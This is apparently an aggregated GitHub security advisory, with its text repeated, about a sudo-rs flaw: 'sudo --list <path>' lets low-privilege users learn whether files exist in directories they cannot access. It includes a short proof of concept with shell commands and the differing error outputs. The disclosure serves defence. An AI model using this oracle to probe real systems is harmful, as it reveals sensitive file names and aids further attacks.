Headline

GHSA-98cv-wqjx-wx8f: sudo-rs Allows Low Privilege Users to Discover the Existence of Files in Inaccessible Folders

Summary

Users with no (or very limited) sudo privileges can determine whether files exists in folders that they otherwise cannot access using sudo --list <pathname>.

PoC

As root:

# mkdir /tmp/foo
# chmod a-rwx /tmp/foo
# touch /tmp/foo/secret_file

As a user without any (or limited) sudo rights:

$ sudo --list /tmp/foo/nonexistent_file
sudo-rs: '/tmp/foo/nonexistent_file': command not found
$ $ sudo --list /tmp/foo/secret_file
sudo-rs: Sorry, user eve may not run sudo on host.

I.e. the user can distinguish whether files exist.

Original sudo (vulnerable version tested by us: 1.9.15p5) exhibited similar behaviour for files with the executable bit set.

Impact

Users with local access to a machine can discover the existence/non-existence of certain files, revealing potentially sensitive information in the file names. This information can also be used in conjunction with other attacks.

Credits

This issue was identified by sudo-rs developer Marc Schoolderman

6 days ago

ghsa

Open in Source

#mac #git

Summary

Users with no (or very limited) sudo privileges can determine whether files exists in folders that they otherwise cannot access using sudo --list <pathname>.

PoC

As root:

# mkdir /tmp/foo
# chmod a-rwx /tmp/foo
# touch /tmp/foo/secret_file

As a user without any (or limited) sudo rights:

$ sudo --list /tmp/foo/nonexistent_file
sudo-rs: '/tmp/foo/nonexistent_file': command not found
$ $ sudo --list /tmp/foo/secret_file
sudo-rs: Sorry, user eve may not run sudo on host.

I.e. the user can distinguish whether files exist.

Related

Original sudo (vulnerable version tested by us: 1.9.15p5) exhibited similar behaviour for files with the executable bit set.

Impact

Credits

This issue was identified by sudo-rs developer Marc Schoolderman

References